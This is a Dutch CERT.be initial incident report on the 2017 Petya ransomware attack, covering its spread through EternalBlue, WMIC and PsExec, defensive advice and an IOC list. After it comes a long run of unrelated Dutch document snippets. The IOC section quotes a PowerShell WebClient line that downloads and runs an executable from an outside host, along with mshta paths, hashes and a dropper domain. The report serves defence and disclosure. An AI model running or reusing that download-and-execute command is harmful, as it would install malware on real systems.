Petya ransomware aanval

Maat: px
Weergave met pagina beginnen:

Download "Petya ransomware aanval"

Transcriptie

1 Petya ransomware aanval Intieel Rapport TLP: [WHITE]

2 Inhoud 1 Samenvatting Advies IOC s... 5 Petya ransomware aanval - 27 June TLP: [WHITE] 2

3 1 SAMENVATTING DREIGING SLACHTOFFERS DADERS HOOG wereldwijd bedrijven + onbekend individuen CERT.be ontving informatie via betrouwbare partners dat de Oekraïnische overheid, Russische bedrijven en een containerterminal bedrijf uit Denemarken onder aanval lagen van een nieuwe ransomware aanval. Kort nadien werd de slachtofferlijst aangevuld met bedrijven uit Nederland, Spanje, Frankrijk, Groot-Britanië en België. Het lijkt te gaan over een nieuwe variant van de Petya ransomware die zich (intern) lijkt te verspreiden via de EternalBlue/DoublePulsar exploit 1 voor SMB die vorige maand furore maakte via de ransomware Wannacry. Eenmaal het systeem geïnfecteerd is, verspreidt de ransomware zich verder via een interne Windows toolkit (WMIC) en via een externe beheertool PsExec. De initiële aanvalvector is momenteel onbekend, maar het wordt geopperd dat het zich zou verspreiden via een excel document met een valse Windows signature 2 (LokiBot 3 ). Eenmaal het systeem geïnfecteerd is met de ransomware, probeert het de harde schijf te encrypteren door gebruik te maken van beheerdersrechten. Indien deze niet voorhanden zijn, gebruikt het een kernel exploit, injecteert het zichtzelf in de MBR 4 van de harde schijf en maakt het een scheduled task aan die een herstart uitvoert na één uur. Bij het heropstarten van het systeem laadt de ransomware zich in het geheugen en begint de encryptie. Er is geen killswitch aanwezig en de ransomware communiceert niet met C2 servers 5. Volgende extensies worden geëncrypteerd: ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd. kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.v di.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip" Na de encryptie krijgt de gebruiker een scherm te zien met volgende boodschap: Huidige informatie wijst erop dat systemen die gepatcht zijn met de wanacry-patch, toch kwetsbaar zijn voor deze ransomware. Momenteel hebben we weet van infecties op Windows XP, 7 en 10 van verschillende patchniveaus Petya ransomware aanval - 27 June TLP: [WHITE] 3

4 2 ADVIES Niet betalen! Het adres is niet langer actief; Patch systemen (in het bijzonder MS17-010); Voorkom Local Administrator rechten voor gewone gebruiker; Zoek naar volgende scheduled task en verwijder: o C:\Windows\system32\shutdown.exe /r /f Houd AV/IDS/IPS up-to-date; Voorzie een Backup strategie; Traditionele beschermingsstrategiën tegen Ransomware Petya ransomware aanval - 27 June TLP: [WHITE] 4

5 3 IOC S Category Type Value url External link 0d b30f6b0d7d3a745// md5 415fe69bf32634ca98fa07633f4118e1 External url b30f6b0d7d3a745?environmentId=100 Order doc External url fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d 206 External vulnerability CVE sha1 101cc1cb56c407d5b9149f2c3b d23ba84 url url sha a0b5ee4b95ddad634dd225dc0f73 md a4daf8eb9660f1c67e30f8b25 Network ip-dst mshta.exe ee29b9c01318a1e23836b949942db14d fdae2f41df9f0dcd922c63 bc6 myguy.xls Network url h11p:// /myguy.xls Network ip-dst PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe', '%APPDATA%\10807.exe') ;) exe %APPDATA%\10807.exe %APPDATA%\10807.exe' md5 a1d5895f85751dfe67d19cccb51b051a Petya ransomware aanval - 27 June TLP: [WHITE] 5

6 Network External Analysis domain coffeinoffice.xyz PID: 3096)File Name BCA9D6.exeMD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051ASHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB301 7AF1FBDFile Size bytesconnects to the host: COFFEINOFFICE.XYZ 80Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part %APPDATA%\10807.exe sha1 url Sha1 Filepath powershell.exe 9288fb8e96d419586fc8c595dd95353d48e8a060 System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe exe %WINDIR%\System32\mshta.exe C:\myguy.xls.hta BCA9D6.exe 17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1f bd cc450ef5f8c5f ec1fed91f694e0d b30f6b0d7d3a f917aaba5684fbe56d3c57d48ef2a1aa7cf06d 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94 b1 752e5cf9e47509ce51382c88fc4d7e53b5ca44ba22a94063f b362 ca5 dllhost.dat wowsmith123456@posteo.net Petya ransomware aanval - 27 June TLP: [WHITE] 6

Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is.

Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is. WannaCry TLP: Green 1 CONTEXT Op vrijdag 12/05/2017 is een besmetting met een variant van het WannaCrypt (of Wanna/WaCry) vastgesteld bij verschillende grote bedrijven in Spanje. Kort daarna heeft dezelfde

Nadere informatie

Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is.

Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is. WannaCry TLP: WHITE 1 CONTEXT Op vrijdag 12/05/2017 is een besmetting met een variant van het WannaCrypt (f Wanna/WaCry) vastgesteld bij verschillende grte bedrijven in Spanje. Krt daarna heeft dezelfde

Nadere informatie

Gratis bescherming tegen zero-days exploits

Gratis bescherming tegen zero-days exploits Gratis tegen zero-days exploits We zien de laatste jaren een duidelijke toename van geavanceerde dreigingen op onze computersystemen. In plaats van het sturen van alleen e-mails met geïnfecteerde bijlagen

Nadere informatie

Insecurities within automatic update systems

Insecurities within automatic update systems Can patching let a cracker in?. Peter Ruissen Robert Vloothuis RP2 Project OS3 System and Network Engineering University of Amsterdam June 28, 2007 1 2 3 4 Linux distributies Java Runtime Environment Mozilla

Nadere informatie

1 Ransomware Preventie Slachtoffer van ransomware?... 8

1 Ransomware Preventie Slachtoffer van ransomware?... 8 Inhoud 1 Ransomware... 3 Introductie... 3 Ransomware: een stijgende dreiging... 4 Wat is het losgeld dat gevraagd wordt bij ransomware?... 4 Hoe wordt een informaticasysteem geïnfecteerd... 5 Hoe gebeurt

Nadere informatie

Petya/NotPetya Malware

Petya/NotPetya Malware Petya/NtPetya Malware Rapprt ver de wereldwijde infectie 30 Juni 2017 TLP: [WHITE] Inhud 1 Executive Summary...3 2 Technische Samenvatting...4 2.1 Karakteristieken... 4 2.2 Verspreiding... 5 2.3 Na infectie...

Nadere informatie

DIGIPASS Native Bridge wordt niet gedetecteerd wanneer de DIGIPASS 870 bekabeld gebruikt wordt.

DIGIPASS Native Bridge wordt niet gedetecteerd wanneer de DIGIPASS 870 bekabeld gebruikt wordt. KB 120223 DIGIPASS Native Bridge wordt niet gedetecteerd wanneer de DIGIPASS 870 bekabeld gebruikt wordt. Creation date: 05/07/2016 Last Review: 5/07/2016 Revision number: 1 Document type: FAQ Security

Nadere informatie

Ransomware is here to stay: bescherm jezelf

Ransomware is here to stay: bescherm jezelf Ransomware is here to stay: bescherm jezelf. Date: Juli 2017 Version: 1.0 Wat is ransomware nu eigenlijk en waarom kan het zo gevaarlijk zijn? In dit artikel geven we uitleg wat het is, wat wij doen om

Nadere informatie

Voor op afstand os installatie moeten de volgende onderdelen geïnstalleerd zijn op de Windows 2000 server.

Voor op afstand os installatie moeten de volgende onderdelen geïnstalleerd zijn op de Windows 2000 server. Werkstuk door een scholier 1063 woorden 13 januari 2006 6,8 51 keer beoordeeld Vak Informatica Risimage Hoe werkt RIS? RIS gebruikt DHCP en de Active Directory service om cliënt van afstand te installeren.

Nadere informatie

De Security System Integrator Het wapen tegen onbekende dreigingen

De Security System Integrator Het wapen tegen onbekende dreigingen De Security System Integrator Het wapen tegen onbekende dreigingen De Business Case 9/16/2015 2 De Cyberaanval Een tastbaar probleem Strategische Impact Merkwaarde Inkomstenderving Intellectueel eigendom

Nadere informatie

Labo-sessie: Gegevensbeveiliging

Labo-sessie: Gegevensbeveiliging Labo-sessie: Gegevensbeveiliging 1 Inleiding Dit labo zal devolgende topics behandelen: eid card Opdracht 1: Digitaal signeren van een MS Office document (zie pagina: 5) Opdracht 2: Digitaal signeren van

Nadere informatie

Wat te doen tegen ransomware

Wat te doen tegen ransomware Wat te doen tegen ransomware DATA Dennis Switzer Senior Consultant PwC Edgar Versteeg Commercieel Product Manager KPN Security Services Ransomware Trends en ontwikkelingen BC/DR Malware die systemen en

Nadere informatie

2 Inleiding Server 2012 ii.2 VMware installeren en gereedmaken

2 Inleiding Server 2012 ii.2 VMware installeren en gereedmaken Week Datum Les nr Onderwerp 35 24-8-2015 1 Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen: Lessen van het boek & Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2

Nadere informatie

Upgrade EEPC 7.0.2 naar Drive Encryption 7.1

Upgrade EEPC 7.0.2 naar Drive Encryption 7.1 Upgrade EEPC 7.0.2 naar Drive Encryption 7.1 Inhoud 1 Kenmerken... 3 1.1 Hardware eisen... 3 1.2 Software eisen... 3 2 Upgrade-paden... 4 2.1 De stappen in het kort... 4 3 Start... 5 3.1 Upgrade de EEAdmin

Nadere informatie

Installatie Procedure Femap STAND ALONE & FLOATING LICENTIE

Installatie Procedure Femap STAND ALONE & FLOATING LICENTIE Installatie Procedure Femap STAND ALONE & FLOATING LICENTIE Mocht u niet weten wat voor type licentie u heeft, neem dan contact met ons op voordat u aan de installatie begint. Deze handleiding kan ook

Nadere informatie

PO1168 EnVivoUSB netwerk hub 1. Ik kan de aangesloten USB apparaten in mijn netwerk niet gebruiken

PO1168 EnVivoUSB netwerk hub 1. Ik kan de aangesloten USB apparaten in mijn netwerk niet gebruiken PO1168 EnVivoUSB netwerk hub 1. Ik kan de aangesloten USB apparaten in mijn netwerk niet gebruiken envivo@teknihall.nl NL : 0900/400 2001 p.1 In het venster van de applicatie wordt gemeld dat de toestellen

Nadere informatie

Maak een image file van je harddisk

Maak een image file van je harddisk 1 van 5 17/03/2006 17:20 Maak een image file van je harddisk Norton Ghost 1. Een backup aanmaken met ghost 2. Terug zetten van een backup met ghost Ghost is een programma van Symantec waarmee u op een

Nadere informatie

Criminaliteit op internet: Ransomware

Criminaliteit op internet: Ransomware Criminaliteit op internet: Ransomware Kwaadaardige software blokkeert PC's van eindgebruikers en lijkt afkomstig van Ecops, FCCU of een andere buitenlandse politiedienst Sinds enkele maanden blijken steeds

Nadere informatie

Datum 15 juni 2006 Versie 1.0.6. Exchange Online. Handleiding voor gebruiker Release 1.0

Datum 15 juni 2006 Versie 1.0.6. Exchange Online. Handleiding voor gebruiker Release 1.0 Datum 1.0.6 Exchange Online Handleiding voor gebruiker Release 1.0 1.0.6 Inhoudsopgave 1 Instellingen e-mail clients 2 1.1 Gebruik via Outlook 2003 2 1.2 Gebruik via ActiveSync 15 1.3 Gebruik via andere

Nadere informatie

Kwaadaardige software blokkeert PC s van eindgebruikers en lijkt afkomstig van Ecops, FCCU of een andere buitenlandse politiedienst

Kwaadaardige software blokkeert PC s van eindgebruikers en lijkt afkomstig van Ecops, FCCU of een andere buitenlandse politiedienst Disclaimer Kwaadaardige software blokkeert PC s van eindgebruikers en lijkt afkomstig van Ecops, FCCU of een andere buitenlandse politiedienst Sinds enkele dagen blijken steeds meer mensen slachtoffer

Nadere informatie

Solcon Online Backup. Aan de slag handleiding voor Linux

Solcon Online Backup. Aan de slag handleiding voor Linux Version 1 September 2007 Installatie: 1. Download het setup bestand (obm-nix.tar.gz) van de website. 2. Voor de volgende stappen dient u root te zijn. 3. Doorloop de volgende stappen voor het uitpakken

Nadere informatie

NIEUWSFLASH 20-06- 12

NIEUWSFLASH 20-06- 12 NIEUWSFLASH 20-06- 12 NR 44-B Voor KAMMENSTRAAT en OMGEVING (Kammenstraat-Hondsberg-Hemelrijkweg-Lazaret-Schuurblok-Kloosterstraat-Grensstraat-Handelsstraat-Hemelrijklaan- Statievelden) Noodnummer: 101

Nadere informatie

Les 2, do 29-01- 15: Inleiding Server 2012 ii.2 VMware installeren en gereedmaken

Les 2, do 29-01- 15: Inleiding Server 2012 ii.2 VMware installeren en gereedmaken Week 5: Les 1, do 2901 15: Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen Lessen van het boek Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2 Netwerkbegrippen

Nadere informatie

Lesplan: Schooljaar 2014-2015 versie: 1.0. HICMBO4P MS Server 2012 Planning

Lesplan: Schooljaar 2014-2015 versie: 1.0. HICMBO4P MS Server 2012 Planning Week 5: Les 1, do 2901 15: Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen Lessen van het boek Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2 Netwerkbegrippen

Nadere informatie

Multi user Setup. Firebird database op een windows (server)

Multi user Setup. Firebird database op een windows (server) Multi user Setup Firebird database op een windows (server) Inhoudsopgave osfinancials multi user setup...3 Installeeren van de firebird database...3 Testing van de connectie met FlameRobin...5 Instellen

Nadere informatie

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering Browser security Wouter van Dongen RP1 Project OS3 System and Network Engineering Februari 4, 2009 1 Introductie Onderzoeksvraag Situatie van de meest populaire browsers Client-side browser assets vs.

Nadere informatie

Symantec Backup Exec System Recovery to VMware ESX Machine

Symantec Backup Exec System Recovery to VMware ESX Machine 1 Symantec Backup Exec System Recovery to VMware ESX Machine How to.. 2 Inhoud: Symantec Backup Exec System Recovery to VMware ESX Machine... 1 Backup Exec Livestate to VMware:... 3 Doel stelling:... 3

Nadere informatie

MULTIFUNCTIONELE DIGITALE SYSTEMEN. Aanmaken van Templates voor Re-Rite

MULTIFUNCTIONELE DIGITALE SYSTEMEN. Aanmaken van Templates voor Re-Rite MULTIFUNCTIONELE DIGITALE SYSTEMEN Aanmaken van Templates voor Re-Rite Templates aanmaken tbv Re-Rite Aanmaken van Templates gaat het eenvoudigst via het webbased beheerprogramma van de e-studio; TopAccess.

Nadere informatie

Les 3, di 25-08- 15: De Installatie van Windows Server 2012 1.1 Windows Server 2012 1.2 De installatie van Windows Server 2012

Les 3, di 25-08- 15: De Installatie van Windows Server 2012 1.1 Windows Server 2012 1.2 De installatie van Windows Server 2012 Week 35: Les 1, ma 24-08- 15: Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen Lessen van het boek Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2 Netwerkbegrippen

Nadere informatie

Les 2, ma 26-01- 15: Inleiding Server 2012 ii.2 VMware installeren en gereedmaken

Les 2, ma 26-01- 15: Inleiding Server 2012 ii.2 VMware installeren en gereedmaken Week 5: Les 1, ma 2601 15: Inleiding en basisbegrippen netwerk / IP i.1 Opbouw van de lessen Lessen van het boek Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht i.2 Netwerkbegrippen

Nadere informatie

Macrium Reflect V4.2 Handleiding

Macrium Reflect V4.2 Handleiding Macrium Reflect V4.2 Handleiding Met Macrium Reflect kunt u een Image (kopie) maken van de C: schijf, waarmee, u na computerproblemen binnen tien minuten weer een goed werkende PC kunt hebben. Ga naar:

Nadere informatie

Security Les 1 Leerling: Marno Brink Klas: 41B Docent: Meneer Vagevuur

Security Les 1 Leerling: Marno Brink Klas: 41B Docent: Meneer Vagevuur Security Les 1 Leerling: Klas: Docent: Marno Brink 41B Meneer Vagevuur Voorwoord: In dit document gaan we beginnen met de eerste security les we moeten via http://www.politiebronnen.nl moeten we de IP

Nadere informatie

Internetbedreigingen in 2003

Internetbedreigingen in 2003 De belangrijkste trends in 2003 Internetbedreigingen in 2003 Kwetsbaarheden* Het aantal kwetsbaarheden stijgt. De tijd tussen het ontdekken van kwetsbaarheden en het uitbreken van een aanval wordt steeds

Nadere informatie

Meldingen 2010-2014. Cijfers over meldingen aan CERT.be

Meldingen 2010-2014. Cijfers over meldingen aan CERT.be Meldingen 2010-2014 Cijfers over meldingen aan CERT.be OVERZICHT 2010 2014 1.1 Gemiddeld aantal meldingen en incidenten per maand: 12000 10000 8000 6000 4000 Meldingen/jaar Incidenten/jaar 2000 0 2010

Nadere informatie

Inhoudsopgave. GlinQ: BattleField2 beheertool, Handleiding versie 1.0

Inhoudsopgave. GlinQ: BattleField2 beheertool, Handleiding versie 1.0 Inhoudsopgave Inleiding... 2 Key features... 2 Suggesties... 2 Inlog venster:... 3... 3... 3 General... 4... 4... 4 Advanced:... 5... 5... 5 Maplist:... 6... 6... 6 Players:... 7... 7... 7 Banlist:...

Nadere informatie

2 Inleiding Server 2012 Donderdag 4 Februari 2016 ii.2 VMware installeren en gereedmaken

2 Inleiding Server 2012 Donderdag 4 Februari 2016 ii.2 VMware installeren en gereedmaken Les nr Onderwerp Datum 1 Inleiding en basisbegrippen netwerk / IP Maandag 1 Februari 2016 i.1 Opbouw van de lessen: Lessen van het boek & Tussentijdse beoordelingsmomenten met theorietoets en eindopdracht

Nadere informatie

Je website veilig de zomer(vakantie) door

Je website veilig de zomer(vakantie) door Je website veilig de zomer(vakantie) door Best veel ellende op het internet Hoe hou je je website veilig Zorg dat je eigen computer virusvrij is (de meeste besmettingen van websites ontstaan via de eigen

Nadere informatie

Windows server 2012. Wesley de Marie. Wesley

Windows server 2012. Wesley de Marie. Wesley Windows server 2012 Wesley Windows server 2012 Naam: Klas: MICNIO2B Leerjaar: Leerjaar 1/2 Inhoud Installeren van windows server 2012... 3 Naam wijzigen... 4 IPV6 uitschakelen... 5 IP toewijzen aan je

Nadere informatie

Criminaliteit op internet: Ransomware

Criminaliteit op internet: Ransomware Pz Grens, Patrick De Smedt Van: Vleugels Sven [sven.vleugels@pzgrens.be] Verzonden: woensdag 20 juni 2012 13:47 Aan: niet-openbare ontvangers: Onderwerp: BIN Flash : Herinnering : Ransomware virus blijft

Nadere informatie

HOWTO: Microsoft Domain Controller en Linux DNS-server. geschreven door Johan Huysmans

HOWTO: Microsoft Domain Controller en Linux DNS-server. geschreven door Johan Huysmans HOWTO: Microsoft Domain Controller en Linux DNS-server geschreven door Johan Huysmans 1. Over deze howto. Deze howto behandelt verschillende aspecten van een MS Windows Domain Controller gebruik makend

Nadere informatie

Handleiding FTP. Uitleg over het aanpassen van de website uit het basispakket, met het programma FileZilla

Handleiding FTP. Uitleg over het aanpassen van de website uit het basispakket, met het programma FileZilla Handleiding FTP Uitleg over het aanpassen van de website uit het basispakket, met het programma FileZilla Inhoud Downloaden van FileZilla...2 Installatie en eerste gebruik van FileZilla...3 Installatie...3

Nadere informatie

Vergeten wachtwoord in Windows 10

Vergeten wachtwoord in Windows 10 Frank Biesmans - syntra@frankbiesmans.be Vergeten wachtwoord in Windows 10 Syntra Limburg - Campus Genk Kerkstraat 1-3600 GENK Tel: +32 89354616 - Fax; +32 89353042 E-Mail: infogenk@syntralimburg.be Inleiding

Nadere informatie

LOOPBAAN. Presentatie voor de loopbaanoriëntatiedag van de Leidsche Flesch Sander Kievit

LOOPBAAN. Presentatie voor de loopbaanoriëntatiedag van de Leidsche Flesch Sander Kievit LOOPBAAN Presentatie voor de loopbaanoriëntatiedag van de Leidsche Flesch Sander Kievit WIE BEN IK EN WAT HEB IK GEDAAN? Sander de Kievit Sinds 2010: TNO Functie: onderzoeker / consultant Vakgebied: Informatiebeveiliging

Nadere informatie

Standard Parts Installatie Solid Edge ST3

Standard Parts Installatie Solid Edge ST3 Hamersveldseweg 65-1b 3833 GL LEUSDEN 033-457 33 22 033-457 33 25 info@caap.nl www.caap.nl Bank (Rabo): 10.54.52.173 KvK Utrecht: 32075127 BTW: 8081.46.543.B.01 Standard Parts Installatie Solid Edge ST3

Nadere informatie

HOE RANSOMWARE JOUW ORGANISATIE KAN GIJZELEN. Ransomware aanvallen en hoe deze worden uitgevoerd

HOE RANSOMWARE JOUW ORGANISATIE KAN GIJZELEN. Ransomware aanvallen en hoe deze worden uitgevoerd HOE RANSOMWARE JOUW ORGANISATIE KAN GIJZELEN Ransomware aanvallen en hoe deze worden uitgevoerd Ransomware is een vorm van malware die bij gebruikers de toegang tot gegevens of systemen blokkeert totdat

Nadere informatie

Netwerkbeveiliging. Sven Sanders

Netwerkbeveiliging. Sven Sanders 1 Netwerkbeveiliging Sven Sanders 2 Gastles 19/4 Peter Van Hemlryck Fortinet Fortigate firewall + praktische voorbeelden Opdracht: 3 lessons learned Wat vind je belangrijk/relevant om te onthouden Wat

Nadere informatie

SECURITY UITDAGINGEN 2015

SECURITY UITDAGINGEN 2015 SECURITY UITDAGINGEN 2015 Hoe uw IT-infrastructuur beschermen? Robby Cauwerts Security Engineer 2015 Check Point Software Technologies Ltd. 1 CHECK POINT NAMED A LEADER IN THE GARTNER MAGIC QUADRANTS FOR

Nadere informatie

Backup Connect installatie van de Client software.

Backup Connect installatie van de Client software. Backup Connect installatie van de Client software. Let s Connect, 2011 Backup Connect [Installatie handleiding] - Nederlands Page 1 Beste klant, gefeliciteert met de huur van uw Backup Connect Cloud product!

Nadere informatie

Bestandssystemen. yvan vander sanden. 16 maart 2015

Bestandssystemen. yvan vander sanden. 16 maart 2015 Bestandssystemen yvan vander sanden 16 maart 2015 Bij elk operating system is het belangrijk te begrijpen hoe schijven en bestandssystemen werken. Schijven moeten geformatteerd worden met een specifiek

Nadere informatie

Clausule verhoor ransomware

Clausule verhoor ransomware Clausule verhoor ransomware Heden bied ik me aan bij jullie diensten teneinde een blokkering van mijn gegevens/informaticasysteem aan te geven. Algemene gegevens Om welke besmet informaticasysteem gaat

Nadere informatie

WAVIX Installatie Handleiding

WAVIX Installatie Handleiding Modelit Rotterdamse Rijweg 126 3042 AS Rotterdam Telefoon +31 10 4623621 info@modelit.nl www.modelit.nl in opdracht van RIKZ WAVIX Installatie Handleiding Modelit KvK Rotterdam 24290229 Datum 27 September

Nadere informatie

MS Exchange instellingen

MS Exchange instellingen MS Exchange instellingen Dit document omschrijft een aantal instellingen welke in geval van problemen bij verzenden van e-mail vanaf een Toshiba e-studio MFP, in MS Exchange gewijzigd kunnen worden. Het

Nadere informatie

Aanmaken van een NBB-certificaat

Aanmaken van een NBB-certificaat Aanmaken van een NBB-certificaat Hoe een certificaat van de Nationale Bank van België (NBB) genereren, hernieuwen (renewal) of opnieuw genereren (recovery)? 1 Inhoudstafel 1. DOEL VAN DEZE HANDLEIDING...

Nadere informatie

Stappen om EduVPN te activeren:

Stappen om EduVPN te activeren: EduVPN onder Ubuntu 16.04 Helaas is de network manager van Ubuntu 16.04 niet in staat met de ovpn file van eduvpn om te gaan. Ook is de standaard openvpn die Ubuntu uitlevert niet de laatste versie. Stappen

Nadere informatie

KPDdoc kerneigenschappen

KPDdoc kerneigenschappen KPDdoc kerneigenschappen Gestructureerd & begeleid aanmaken van electronische informatie Bv. Verslag vergadering in MS Word Workflow Capteren van bestaande informatie Bv. Inkomende emails en post Beveiligd

Nadere informatie

Technical Note #047 Auteur:Mark Vork Gemaakt op:14 februari 2003 Gewijzigd op:9 februari 2004

Technical Note #047 Auteur:Mark Vork Gemaakt op:14 februari 2003 Gewijzigd op:9 februari 2004 Technical Note #047 Auteur:Mark Vork Gemaakt op:14 februari 2003 Gewijzigd op:9 februari 2004 Een IPsec tunnel opzetten met een Netasq door middel van een Safenet client Met behulp van deze technical note

Nadere informatie

BelgoVault Backup Partner installatie van de Client software.

BelgoVault Backup Partner installatie van de Client software. BelgoVault Backup Partner installatie van de Client software. Cloud Partners, 2011 Backup Partner [Installatie handleiding] - nederlands Page 1 Beste klant, Beste partner, gefeliciteert met de huur van

Nadere informatie

Backup Connect installatie van de Client software

Backup Connect installatie van de Client software Backup Connect installatie van de Client software Connectingpeople Pro, 2012 BackupConnect Installatie handleiding 1/10 Beste klant, Gefeliciteerd met de huur van uw Backup Connect Cloud product! U bent

Nadere informatie

Vraag : Antwoord : Meer Infos.pdf. Wat zijn de minimum systeemeisen voor Bouwsoft?

Vraag : Antwoord : Meer Infos.pdf. Wat zijn de minimum systeemeisen voor Bouwsoft? Vraag : Wat zijn de minimum systeemeisen voor Bouwsoft? Antwoord : Systeemvereisten lokale pc of netwerk / Verdere technische info bouwsoft.eu 1. Pc met pentium III 1000Mhz - 512MB RAM (1GB igv Vista)-

Nadere informatie

HANDLEIDING ENTERPRISE DRIVE. Laatst bijgewerkt: January 18, 2016

HANDLEIDING ENTERPRISE DRIVE. Laatst bijgewerkt: January 18, 2016 HANDLEIDING ENTERPRISE DRIVE Laatst bijgewerkt: January 18, 2016 Inhoudsopgave 1 Enterprise Drive installeren...3 2 Enterprise Drive voor de eerste maal opstarten...3 3 Deelnemen aan Spaces (Een uitnodiging

Nadere informatie

UBUNTU 8 installatie. 13/10/2009 http://www.ivowebschool.be/uploads/ ivowebschool.be/ /205bc10d-ef8e-4a 1/14. Onderwerpen

UBUNTU 8 installatie. 13/10/2009 http://www.ivowebschool.be/uploads/ ivowebschool.be/ /205bc10d-ef8e-4a 1/14. Onderwerpen UBUNTU 8 installatie Onderwerpen Ubuntu downloaden VMWare klaarmaken Ubuntu installeren VMWare tools installeren 1. Ubuntu downloaden ( ) Je kan ubuntu gratis downloaden via de website www.ubuntu.com.

Nadere informatie

AHSAY OBM QUICK START GUIDE

AHSAY OBM QUICK START GUIDE AHSAY OBM QUICK START GUIDE Contents AHSAY OBM QUICK START GUIDE... 2 ALGEMENE INSTELLINGEN... 2 RECHTEN INSTELLEN... 2 BACKUP VAN NETWERKSCHIJVEN... 4 INSTELLEN VAN DE IN-FILE DELTA... 6 DE ENCRYPTIESLEUTEL...

Nadere informatie

HOW TO RESTORE A SYSTEM IMAGE IN WINDOWS SERVER 2012

HOW TO RESTORE A SYSTEM IMAGE IN WINDOWS SERVER 2012 HOW TO RESTORE A SYSTEM IMAGE IN WINDOWS SERVER 2012 Contents WINDOWS SERVER 2012 BUILT-IN BACKUP APPLICATION TO RESTORE A SYSTEM IMAGE.... 2 RESTORE OPTIONS IN WINDOWS SERVER BACKUP... 2 SYSTEM RECOVERY

Nadere informatie

Dit document beschrijft belangrijke aandachtspunten voor de installatie van Deep Defender. Ook omschrijft dit document hoe de beheerder kan omgaan

Dit document beschrijft belangrijke aandachtspunten voor de installatie van Deep Defender. Ook omschrijft dit document hoe de beheerder kan omgaan Dit document beschrijft belangrijke aandachtspunten voor de installatie van Deep Defender. Ook omschrijft dit document hoe de beheerder kan omgaan met Threat meldingen, driver problemen en hoe het product

Nadere informatie

COMPUTERONDERHOUD. Pagina 1 van 9

COMPUTERONDERHOUD. Pagina 1 van 9 COMPUTERONDERHOUD Een aangename PC om mee te werken is een PC die goed onderhouden is. Het onderhoud van een PC is op zich niet moeilijk en kan je stap voor stap uitvoeren. Voor dat je begint aan het onderhoud

Nadere informatie

Installatie Handleiding Alimentatie Rekendisk. 2011 Sdu Uitgeverij / A. Koppenaal

Installatie Handleiding Alimentatie Rekendisk. 2011 Sdu Uitgeverij / A. Koppenaal Installatie Handleiding Alimentatie Rekendisk / A. Koppenaal I Installatie Handleiding Alimentatie Rekendisk Inhoudsopgave A Inleiding 1 B Installatie 2 C Troubleshoot 4 1 Melding:... Kan database niet

Nadere informatie

2 Installatie Windows Server 2008 R2 Standard

2 Installatie Windows Server 2008 R2 Standard 10 2 Installatie Windows Server 2008 R2 Standard 2.1 Mogelijke proefopstellingen 2.1.1 64-bit computer, zonder Virtualization Technology Minimaal 2GB geheugen Netwerkkaart Naar Internet, waarschijnlijk

Nadere informatie

PRIJSLIJST EINDKLANTEN DOMEINNAMEN EN SHARED WEBHOSTING

PRIJSLIJST EINDKLANTEN DOMEINNAMEN EN SHARED WEBHOSTING PRIJSLIJST EINDKLANTEN DOMEINNAMEN EN SHARED WEBHOSTING Extensie Land Looptijd Excl. p/j Incl. p/j.be België 1 jaar 15,00 18,15.biz Internationaal 1 jaar 15,00 18,15.co.uk* Groot-Brittannië 2 jaar 15,00

Nadere informatie

Pagina 1. Installatiehandleiding vanaf versie 2017

Pagina 1. Installatiehandleiding vanaf versie 2017 Pagina 1 Installatiehandleiding vanaf versie 2017 Inhoudsopgave Update stand alone DATAflor BUSINESS (single user)... 3 Update server DATAflor BUSINESS... 6 Update client DATAflor BUSINESS (na server update)...

Nadere informatie

Resultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities

Resultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities De Nessus scan We hebben ervoor gekozen om de webserver met behulp van Nessus uitvoerig te testen. We hebben Nessus op de testserver laten draaien, maar deze server komt grotendeels overeen met de productieserver.

Nadere informatie

Quickstart handleiding

Quickstart handleiding Quickstart handleiding MS Outlook Account instellen Rechten geven offline werken www.pimbox.nl/support a hosted zarafa product Inhoudsopgave Installatie van de Zarafa Outlook Client 3 Aanmaken van een

Nadere informatie

Installatie Domein Windows 2000

Installatie Domein Windows 2000 Nodig : a. installatie van Windows 2000 server afgewerkt b. installatie van Windows 2000 Service Pack 4.0 afgewerkt c. toekennen Ip-adres aan de server afgewerkt Bij het heropstarten van de server krijgt

Nadere informatie

Systeemeisen Exact Compact product update 406

Systeemeisen Exact Compact product update 406 1 van 6 08-10-2013 12:07 Exact Compact Systeemeisen Exact Compact product update 406 Een pressionele administratie moet bedrijfszeker zijn. U moet er in het dagelijks gebruik snel en zonder onderbrekingen

